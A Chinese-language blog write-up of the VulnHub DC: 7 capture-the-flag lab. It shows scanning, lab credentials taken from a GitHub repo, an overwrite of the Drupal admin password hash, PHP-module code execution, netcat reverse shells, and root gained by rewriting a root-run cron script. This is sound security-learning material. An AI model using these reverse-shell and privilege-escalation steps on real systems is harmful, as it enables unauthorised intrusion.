Site icon MkS

[資訊安全] VulnHub – DC: 7 Write-up

Vulnhub DC 系列看來是沒有辦法在農曆春節前解完,目前來到了第七第 DC: 7 ,還剩下兩題,在解題過程中其實也都還算順遂,只是對於某些 CMS 或是環境不熟導致徘徊不前,但至少解題思路都還算清晰明確且可行。

環境設定

VirtualBox: Kali & DC: 7
Net Config: NAT Network

尋找靶機

$ nmap 10.0.2.1/24 -sP 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-09 09:52 CST
Nmap scan report for 10.0.2.1
Host is up (0.010s latency).
Nmap scan report for 10.0.2.2
Host is up (0.00071s latency).
Nmap scan report for 10.0.2.15
Host is up (0.000098s latency).
Nmap scan report for 10.0.2.18
Host is up (0.00081s latency).
Nmap done: 256 IP addresses (4 hosts up) scanned in 3.05 seconds

$ nmap 10.0.2.18 -p- -A
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-09 09:52 CST
Nmap scan report for 10.0.2.18
Host is up (0.00074s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE  VERSION
22/tcp open  ssh      OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 d0:02:e9:c7:5d:95:32:ab:10:99:89:84:34:3d:1e:f9 (RSA)
|   256 d0:d6:40:35:a7:34:a9:0a:79:34:ee:a9:6a:dd:f4:8f (ECDSA)
|_  256 a8:55:d5:76:93:ed:4f:6f:f1:f7:a1:84:2f:af:bb:e1 (ED25519)
80/tcp open  ssl/http Apache/2.4.25 (Debian)
|_http-generator: Drupal 8 (https://www.drupal.org)
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/ 
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register/ 
| /user/password/ /user/login/ /user/logout/ /index.php/admin/ 
|_/index.php/comment/reply/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Welcome to DC-7 | D7
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.27 seconds

解題過程

Wappalyzer

這是個 Drupal 8 的 CMS。

Get the shell via SSH

首先針對 Drupal 8 做了各種嘗試,並把找得到的 PoC 都跑過一輪沒有結果,於是又回過頭來找尋提示,這邊比較有趣的點是 What you will have to do, is to think "outside" the box,在想線索可能不在靶機上?

結果在最下方發現 @DC7USER 字樣,並且 Google 後得到 Dc7User 該使用者的資料,並他存在一個名稱為 staffdb 的 Repositories,發現 Readme.md 就寫著這是 DC: 7 該題的線索,並在 config.php 檔案底下發現帳號密碼組。

<?php
    $servername = "localhost";
    $username = "dc7user";
    $password = "MdR3xOgB7#dW";
    $dbname = "Staff";
    $conn = mysqli_connect($servername, $username, $password, $dbname);
?>

嘗試登入 Drupal 失敗,並轉為嘗試 SSH 且登入成功。

成功登入後,家目錄底下存放 backups 資料夾與 mbox 文字檔,其中 mbox 是信件內容,裡從裡面可以發現有些備份紀錄,擷取一封信件觀察後發現,似乎有一隻程式被寫到 crontab 中,並且是以 root 的身分去執行,大致行為就是備份網站資料到 dc7user 的 backups 資料夾底下。

嘗試透過 crontab -l 查看,但只能看到自己的排程,移動到 /opt/scripts/ 觀察發現,該檔案的群組權限為 www-data,意思可能需要藉由 Drupal 取得一個 shell 並且改寫 backups.sh 檔案內容,讓 Root 幫忙做點事情,具體策略如下:

  1. 從 Drupal 的設定檔中找出資料庫登入資訊
  2. 嘗試找到登入 Drupal 方法,並尋找機會 RCE
  3. 成功 RCE 之後,以 www-data 身分竄改 backups.sh 內容

由於 backups 資料夾底下的備份資料有被加密,於是觀察到 /opt/scripts/backups.sh 發現加密方法與密鑰。

cat /opt/scripts/backups.sh 
#!/bin/bash
rm /home/dc7user/backups/*
cd /var/www/html/
drush sql-dump --result-file=/home/dc7user/backups/website.sql
cd ..
tar -czf /home/dc7user/backups/website.tar.gz html/
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz
chown dc7user:dc7user /home/dc7user/backups/*
rm /home/dc7user/backups/website.sql
rm /home/dc7user/backups/website.tar.gz

登入資料庫

為了取得 Drupal 的控制權,需要先挖出使用者名稱與密碼,藉由設定檔取得資料庫登入資訊,再藉由資料庫取得當前使用者密碼,當然也可以直接修改密碼來取得控制權限,這套路在 DC: 1 時就玩過。

$ cat /var/www/html/sites/default/settings.php
...
$databases['default']['default'] = array (
  'database' => 'd7db',
  'username' => 'db7user',
  'password' => 'yNv3Po00',
  'prefix' => '',
  'host' => 'localhost',
  'port' => '',
  'namespace' => 'Drupal\\Core\\Database\\Driver\\mysql',
  'driver' => 'mysql',
);

$ mysql -u db7user -p
Enter password:
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 9
Server version: 10.1.38-MariaDB-0+deb9u1 Debian 9.8

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> use d7db;

MariaDB [d7db]> select * from users_field_data;
+-----+----------+--------------------+--------------------------+---------+---------------------------------------------------------+-------------------+---------------------+--------+------------+------------+------------+------------+-------------------+------------------+
| uid | langcode | preferred_langcode | preferred_admin_langcode | name    | pass                                                    | mail              | timezone            | status | created    | changed    | access     | login      | init              | default_langcode |
+-----+----------+--------------------+--------------------------+---------+---------------------------------------------------------+-------------------+---------------------+--------+------------+------------+------------+------------+-------------------+------------------+
|   0 | en       | en                 | NULL                     |         | NULL                                                    | NULL              |                     |      0 | 1567054076 | 1567054076 |          0 |          0 | NULL              |                1 |
|   1 | en       | en                 | NULL                     | admin   | $S$Ead.KmIcT/yfKC.1H53aDPJasaD7o.ioEGiaPy1lLyXXAJC/Qi4F | admin@example.com | Australia/Melbourne |      1 | 1567054076 | 1567054076 | 1567098850 | 1567098643 | admin@example.com |                1 |
|   2 | en       | en                 | en                       | dc7user | $S$EKe0kuKQvFhgFnEYMpq.mRtbl/TQ5FmEjCDxbu0HIHaO0/U.YFjI | dc7user@blah.com  | Australia/Brisbane  |      1 | 1567057938 | 1567057938 |          0 |          0 | dc7user@blah.com  |                1 |
+-----+----------+--------------------+--------------------------+---------+---------------------------------------------------------+-------------------+---------------------+--------+------------+------------+------------+------------+-------------------+------------------+
3 rows in set (0.00 sec)

由於密碼是經過 Hash 的,這時參考「Drupal 8 → How to manually reset an admin password on CentOS」一文,可以使用 php core/scripts/password-hash.sh "NewPasswordHere" 來產生 HASH 後的密碼。

dc7user@dc-7:~$ cd /var/www/html/core/scripts/
dc7user@dc-7:/var/www/html/core/scripts$ php password-hash.sh "key123456"

password: key123456             hash: $S$E9iftHmVReTilu0OtcE02AX8.kJh7cwuslb0668a1kBrAt4j/fzE

接著就是取代 admin 原本的密碼。

MariaDB [d7db]> UPDATE users_field_data SET pass='$S$E9iftHmVReTilu0OtcE02AX8.kJh7cwuslb0668a1kBrAt4j/fzE' WHERE name = 'admin';
Query OK, 1 row affected (0.06 sec)
Rows matched: 1  Changed: 1  Warnings: 0

修改完畢之後會發現還是無法登入,此時記得還要清除 flood 與 cache_entity 紀錄。

MariaDB [d7db]> truncate table flood;
Query OK, 0 rows affected (0.32 sec)

MariaDB [d7db]> truncate table cache_entity;
Query OK, 0 rows affected (0.22 sec)

登入成功之後,發現無法像是 DC: 3 一樣直接編輯 PHP,隨即又找到 Install new module 上傳點,似乎可以透過安裝模組來 RCE,在官方找到 PHP 模組,該模組可以讓使用者在撰寫文章時,使用 PHP 語法。

由於可以直接使用 URL 進行安裝(感覺起來好方便好可怕ლ(╹◡╹ლ)?),於是就填上了 PHP 模組的檔案連結 https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz

安裝成功後直接 Enable。

接著新增文章,並選擇 Text format 為 PHP code,就可以開始上馬了。

Get Webshell

成功新增文章之後,直接瀏覽後,再透過 POST 的方式操作 Webshell,接著又是把一個 Reverse shell 丟回來的操作。

Listen

nc -nl -vv -p 8888

Victim

nc -e /bin/sh 10.0.2.15 8888
python -c "import pty;pty.spawn('/bin/bash')"

Get Root to Win

然後現在終於可以編輯 backups.sh 腳本,讓 root 來幫你做點事情。

echo "#!/bin/bash" >/opt/scripts/backups.sh
echo "nc -e /bin/sh 10.0.2.15 8889" >> /opt/scripts/backups.sh

記得先建立 nc 連線,並且靜候佳音。

cd /root
ls
theflag.txt
cat theflag.txt

888       888          888 888      8888888b.                             888 888 888 888 
888   o   888          888 888      888  "Y88b                            888 888 888 888 
888  d8b  888          888 888      888    888                            888 888 888 888 
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888 
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888 
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P 
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "  
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888 


Congratulations!!!

Hope you enjoyed DC-7.  Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.

I'm sending out an especially big thanks to:

@4nqr34z
@D4mianWayne
@0xmzfr
@theart42

If you enjoyed this CTF, send me a tweet via @DCAU7.
Exit mobile version